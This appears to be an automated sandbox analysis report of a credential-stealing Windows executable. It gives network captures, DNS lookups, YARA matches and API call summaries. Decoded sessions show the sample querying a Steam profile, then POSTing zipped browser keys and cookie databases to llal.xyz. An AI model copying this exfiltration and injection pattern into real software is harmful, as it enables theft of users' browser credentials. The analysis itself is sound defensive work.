                                                                                                                      Jun 1, 2024 17:42:09.733118057 CEST49712443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:09.733125925 CEST44349712188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:09.733179092 CEST49712443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:09.733278990 CEST49712443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:09.733297110 CEST44349712188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:09.733311892 CEST49712443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:09.733342886 CEST49712443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:10.819395065 CEST49713443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:10.819442034 CEST44349713188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:10.819531918 CEST49713443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:10.819852114 CEST49713443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:10.819865942 CEST44349713188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:11.425451994 CEST44349713188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:11.425524950 CEST49713443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:11.425940990 CEST49713443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:11.425949097 CEST44349713188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:11.426127911 CEST49713443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:11.426132917 CEST44349713188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:11.426294088 CEST49713443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:11.426294088 CEST49713443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:11.426310062 CEST44349713188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:11.426318884 CEST44349713188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:11.819138050 CEST44349713188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:11.819209099 CEST44349713188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:11.819386005 CEST49713443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:11.819386959 CEST49713443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:11.819580078 CEST49713443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:11.819580078 CEST49713443192.168.2.10188.114.97.3
                                                                                                                      Jun 1, 2024 17:42:11.819607019 CEST44349713188.114.97.3192.168.2.10
                                                                                                                      Jun 1, 2024 17:42:11.819659948 CEST49713443192.168.2.10188.114.97.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 1, 2024 17:42:01.288255930 CEST | 52708 | 53 | 192.168.2.10 | 1.1.1.1
Jun 1, 2024 17:42:01.297350883 CEST | 53 | 52708 | 1.1.1.1 | 192.168.2.10
Jun 1, 2024 17:42:02.968707085 CEST | 64086 | 53 | 192.168.2.10 | 1.1.1.1
Jun 1, 2024 17:42:02.983206987 CEST | 53 | 64086 | 1.1.1.1 | 192.168.2.10

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jun 1, 2024 17:42:01.288255930 CEST | 192.168.2.10 | 1.1.1.1 | 0x3743 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Jun 1, 2024 17:42:02.968707085 CEST | 192.168.2.10 | 1.1.1.1 | 0xf6a2 | Standard query (0) | llal.xyz | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jun 1, 2024 17:42:01.297350883 CEST | 1.1.1.1 | 192.168.2.10 | 0x3743 | No error (0) | steamcommunity.com | | 104.102.42.29 | A (IP address) | IN (0x0001) | false
Jun 1, 2024 17:42:02.983206987 CEST | 1.1.1.1 | 192.168.2.10 | 0xf6a2 | No error (0) | llal.xyz | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jun 1, 2024 17:42:02.983206987 CEST | 1.1.1.1 | 192.168.2.10 | 0xf6a2 | No error (0) | llal.xyz | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                                                                                                      • steamcommunity.com
                                                                                                                      • llal.xyz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49708 | 104.102.42.29 | 443 | 7584 | C:\Users\user\Desktop\0x001900000002ab40-59.exe

Timestamp | Bytes transferred | Direction | Data
2024-06-01 15:42:02 UTC | 206 | OUT | GET /profiles/76561199619938930 HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
                                                                                                                      Host: steamcommunity.com
                                                                                                                      Cache-Control: no-cache
2024-06-01 15:42:02 UTC | 1870 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Date: Sat, 01 Jun 2024 15:42:02 GMT
                                                                                                                      Content-Length: 34764
                                                                                                                      Connection: close
                                                                                                                      Set-Cookie: sessionid=872facd2b398d80218604df1; Path=/; Secure; SameSite=None
                                                                                                                      Set-Cookie: steamCountry=US%7C129b19db70bc2b7ff2901c827e2c9472; Path=/; Secure; HttpOnly; SameSite=None
2024-06-01 15:42:02 UTC | 14514 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-06-01 15:42:02 UTC | 16384 | IN | Data Ascii: av" href="https://help.steampowered.com/en/">SUPPORT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'super
2024-06-01 15:42:02 UTC | 3768 | IN | Data Ascii: ;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script>
2024-06-01 15:42:02 UTC | 98 | IN | Data Ascii: </div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49709 | 188.114.97.3 | 443 | 7584 | C:\Users\user\Desktop\0x001900000002ab40-59.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-01 15:42:03 UTC | 210 | OUT | GET /ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d HTTP/1.1
User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
Host: llal.xyz
Cache-Control: no-cache
2024-06-01 15:42:04 UTC | 575 | IN | HTTP/1.1 200 OK
Date: Sat, 01 Jun 2024 15:42:03 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hv2F14leQl0J%2FlwjhN8c9MUMWGnm%2FVRoK6rHWjDmpVwam5aUYq6s4s%2F2Bpl2gp%2BmoQIYfUni8pOfjMN7NxhefnSfMJ4JZQ%2FzHAuqvVXnqXpxcBuQq5Mk4%2FYLAw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 88d04fb8fca446d7-DFW
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49710 | 188.114.97.3 | 443 | 7584 | C:\Users\user\Desktop\0x001900000002ab40-59.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-01 15:42:04 UTC | 161 | OUT | POST /Up HTTP/1.1
Content-Type: application/octet-stream; boundary=----
User-Agent: MyApp/1.0
Host: llal.xyz
Content-Length: 343
Cache-Control: no-cache
2024-06-01 15:42:04 UTC | 331 | OUT | Data Ascii: PKA]X(2ae977f4-db12-4876-9e4d-fc8d1778842d.txt}10bmg\hih(Ed #KH`o_q*Ij9$s|tY<QQoQUr)T\QM)-|PKxyPKA]Xxy(
2024-06-01 15:42:04 UTC | 12 | OUT | Data Ascii: --------
2024-06-01 15:42:05 UTC | 519 | IN | HTTP/1.1 200 OK
Date: Sat, 01 Jun 2024 15:42:05 GMT
Content-Length: 0
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tR8Mssm7Ki7RZPgL4IPOe%2F5elDZEZs%2FkkcjTwCKNqG2jcxg3rojTdsBAKtz5KeOqP6UU27%2FGIyCAiEdtRZVREFSKLOGvHskpJHOXQkBQ33tWLTLOwa0UF9FhBg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 88d04fc1ab3b463e-DFW
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.10 | 49711 | 188.114.97.3 | 443 | 7584 | C:\Users\user\Desktop\0x001900000002ab40-59.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-01 15:42:07 UTC | 252 | OUT | POST /Up/b HTTP/1.1
Content-Type: application/octet-stream; boundary=----
User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
Host: llal.xyz
Content-Length: 7745
Cache-Control: no-cache
2024-06-01 15:42:07 UTC | 7733 | OUT | Data Ascii: PKB]Xb/c8/key ah\4dCcObPK$$]% PKB]Xb/c8/0/Cookies1mLe{)N1]"6uhaxJ&^9YQ,gH63E]b6sPJ[
2024-06-01 15:42:07 UTC | 12 | OUT | Data Ascii: --------
2024-06-01 15:42:07 UTC | 521 | IN | HTTP/1.1 200 OK
Date: Sat, 01 Jun 2024 15:42:07 GMT
Content-Length: 0
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wJlLzymQDyDfdn1GqHtv4l%2B6UAm3tZtY%2BWmxVO7kecdTHm8vCJUntcnlz8TV5GGkUsi%2FL9E9Ti0dHbLkGe7%2B4CounK3v28O1bPAM2ckkuYqrVh4TL1pASOlbcA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 88d04fcf89946b53-DFW
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.10 | 49712 | 188.114.97.3 | 443 | 7584 | C:\Users\user\Desktop\0x001900000002ab40-59.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-01 15:42:09 UTC | 253 | OUT | POST /Up/b HTTP/1.1
Content-Type: application/octet-stream; boundary=----
User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
Host: llal.xyz
Content-Length: 11629
Cache-Control: no-cache
2024-06-01 15:42:09 UTC | 11617 | OUT | Data Ascii: PKC]Xb/c9/key sckM csN=X;ev7PKK% PKC]Xb/c9/0/Cookies1=o@s4PU0Z$Z)TRv1Ml|.K?__6u@BOrbs9)~rHN=e
2024-06-01 15:42:09 UTC | 12 | OUT | Data Ascii: --------
2024-06-01 15:42:09 UTC | 523 | IN | HTTP/1.1 200 OK
Date: Sat, 01 Jun 2024 15:42:09 GMT
Content-Length: 0
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NkJ5M%2Fw3CQjh%2FErrNQlfuZOInLE1H%2BhMIoXHqy35TZTjug%2BdTXYRQ2vzKzcnZn4QHzNGJOojZ7LEVUI8YKN4D6NyzRmWsXbxeD29Q659UzZrFFn%2BrMoFTc4bqA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 88d04fdcea646c51-DFW
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.10 | 49713 | 188.114.97.3 | 443 | 7584 | C:\Users\user\Desktop\0x001900000002ab40-59.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-01 15:42:11 UTC | 252 | OUT | POST /Up/b HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream; boundary=----
                                                                                                                      User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
                                                                                                                      Host: llal.xyz
                                                                                                                      Content-Length: 9177
                                                                                                                      Cache-Control: no-cache
2024-06-01 15:42:11 UTC | 9165 | OUT | Data Ascii: PKD]Xb/g1/0/cookies.sqliteOO@5F^' $1]*q]9T.[h&o&~Lk]ngUVR'ahDBhlwMF?w3jEG#[&U>H/k<X^zva:
2024-06-01 15:42:11 UTC | 12 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a
Data Ascii: --------
2024-06-01 15:42:11 UTC | 521 | IN | HTTP/1.1 200 OK
                                                                                                                      Date: Sat, 01 Jun 2024 15:42:11 GMT
                                                                                                                      Content-Length: 0
                                                                                                                      Connection: close
                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9nM8ZFdamjNEg%2BAJ0Cbc0DZlAFqrDWpDvS%2Fl1mIhvDsUmOX5i9mq6%2FzebIQpdgHmL20K5Aklgr0Cg1xm3r%2B6o7hF1es9hlcmPzJq2LsqqU7B9N3ZscCD3Hw7ag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 88d04fe9d8732cdf-DFW
                                                                                                                      alt-svc: h3=":443"; ma=86400



                                                                                                                      Target ID:1
                                                                                                                      Start time:11:41:50
                                                                                                                      Start date:01/06/2024
                                                                                                                      Path:C:\Users\user\Desktop\0x001900000002ab40-59.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\0x001900000002ab40-59.exe"
                                                                                                                      Imagebase:0x820000
                                                                                                                      File size:10'445'744 bytes
                                                                                                                      MD5 hash:889CC88BCA04E05C46D9E74636BAEE19
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1722897393.0000000008297000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1722996754.00000000082AB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1725697054.00000000082AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true


                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:0.5%
                                                                                                                        Dynamic/Decrypted Code Coverage:18.8%
                                                                                                                        Signature Coverage:24.7%
                                                                                                                        Total number of Nodes:308
                                                                                                                        Total number of Limit Nodes:11

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(?,0E137A00,4F54B209,-867C85AD,0094335A,..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type), ref: 008744A3
                                                                                                                        • GetProcAddress.KERNEL32(00000001), ref: 00874DE8
                                                                                                                        • VirtualAlloc.KERNEL32(-D602D136,00061E67,-000000015DE352F6,?,?,?,?,43B659F5,?,?,-867C85AD,0094335A,..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type), ref: 0087548D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressAllocHandleModuleProcVirtual
                                                                                                                        • String ID: MW$<$H$db$ve$`
                                                                                                                        • API String ID: 3695083113-1341802392
                                                                                                                        • Opcode ID: d3ff322d2867a784d82855f612de5753b522fc3a78c9cacbe1949e0473d0c2e6
                                                                                                                        • Instruction ID: 20f7611151aee07b9a699ca295c4861c0db79d9931ccb2cb558be9f20cc372db
                                                                                                                        • Opcode Fuzzy Hash: d3ff322d2867a784d82855f612de5753b522fc3a78c9cacbe1949e0473d0c2e6
                                                                                                                        • Instruction Fuzzy Hash: 5DB26977D793244BA74CEF79AC5A06A3572FBC0340342D22EE80AC7566DF344686B687

                                                                                                                        Control-flow Graph

                                                                                                                        • Graph image not preserved. First block: 873f80-873fa6. Named API nodes: GetModuleHandleA, GetProcAddress, VirtualAlloc.
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(?,0E137A00,4F54B209,-867C85AD,0094335A,..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type), ref: 008744A3
                                                                                                                        • GetProcAddress.KERNEL32(00000001), ref: 00874DE8
                                                                                                                        • VirtualAlloc.KERNEL32(-D602D136,00061E67,-000000015DE352F6,?,?,?,?,43B659F5,?,?,-867C85AD,0094335A,..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type), ref: 0087548D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressAllocHandleModuleProcVirtual
                                                                                                                        • String ID: <$H$db$ve$`
                                                                                                                        • API String ID: 3695083113-835828700
                                                                                                                        • Opcode ID: d194a00aea2defdc5d5c64f1d0ccc3996ed8cd0b8515859d5e9b41935fba5f37
                                                                                                                        • Instruction ID: 13e39951b2a665df633c909d5b9985978ff9f380b0be8d8728a2975ade783930
                                                                                                                        • Opcode Fuzzy Hash: d194a00aea2defdc5d5c64f1d0ccc3996ed8cd0b8515859d5e9b41935fba5f37
                                                                                                                        • Instruction Fuzzy Hash: 77A25977D783244BA74CEF79AC5A06A3572FBD0340342D22EE80AC7566DF3846867687
                                                                                                                        APIs
                                                                                                                        • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 059A0B20
                                                                                                                        • NtMapViewOfSection.NTDLL(?,00000000), ref: 059A0BC8
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 059A0F3C
                                                                                                                        • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 059A0FF1
                                                                                                                        • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 059A100E
                                                                                                                        • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 059A10B1
                                                                                                                        • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 059A10E4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual$ProtectSection$View$AllocCreate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2664363762-0
                                                                                                                        • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                        • Instruction ID: 724f3ac0e114b60bf0c73e3f360bd0cf5b2cb7430d5fd6277dd5179061506953
                                                                                                                        • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                        • Instruction Fuzzy Hash: 8F425B72608341AFDB24CF64C848B6BBBE9FF88714F14492DF9859B251E770E944CBA1

                                                                                                                        Control-flow Graph

                                                                                                                        • Graph image not preserved. First block: 8e7610-8e762e. Named API nodes: TryAcquireSRWLockExclusive, ReleaseSRWLockExclusive.
                                                                                                                        APIs
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?), ref: 008E7B94
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLockRelease
                                                                                                                        • String ID: first
                                                                                                                        • API String ID: 1766480654-2456940119
                                                                                                                        • Opcode ID: a84a8974e483c0f265fe890a463a2bbb60113d7390a06b50f6217a4d981121df
                                                                                                                        • Instruction ID: 08e708dfd9ce5e7a18388e4d685340940bef4c3b72d6d0ae1fce955ea1b5229e
                                                                                                                        • Opcode Fuzzy Hash: a84a8974e483c0f265fe890a463a2bbb60113d7390a06b50f6217a4d981121df
                                                                                                                        • Instruction Fuzzy Hash: 47F1E2716083819FDB18CF29C884B2AB7E2FFC5318F19856CE9598B296DB30DC45DB81

                                                                                                                        Control-flow Graph

                                                                                                                        • Graph image not preserved. First block: 8f87e0-8f87f3. Named API nodes: LoadLibraryW, GetProcAddress, TryAcquireSRWLockExclusive, ReleaseSRWLockExclusive.
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(bcryptprimitives.dll,00973F58,?,?,008F86C5,?,00000008,008F8789,?,?,008F632D,?,00000000,00000000,?,?), ref: 008F881C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,ProcessPrng), ref: 008F882C
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00973F50,?,?,008F8789,?,?,008F632D,?,00000000,00000000,?,?,?), ref: 008F8869
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00973F50,?,008F8789,?,?,008F632D,?,00000000,00000000,?,?,?), ref: 008F88A8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$AcquireAddressLibraryLoadProcRelease
                                                                                                                        • String ID: ProcessPrng$bcryptprimitives.dll
                                                                                                                        • API String ID: 969684755-2667675608
                                                                                                                        • Opcode ID: db887bd1ecb76b79b92d7d71cf75e107b9dc149ea2956233fe9da44fd11e25a4
                                                                                                                        • Instruction ID: 2c555b5a0658c30ca87696b0a8fc9a967fe26b88723c0fc0d99fd66428f86875
                                                                                                                        • Opcode Fuzzy Hash: db887bd1ecb76b79b92d7d71cf75e107b9dc149ea2956233fe9da44fd11e25a4
                                                                                                                        • Instruction Fuzzy Hash: 3311B922A24349AAEF242B76AC047763B65EB857D5F448468FB0CC3691DF118940B762

                                                                                                                        Control-flow Graph

                                                                                                                        • Graph image not preserved. First block: 594049b-5940603. Named API nodes: GetPEB, CreateThread.
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 0594073E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
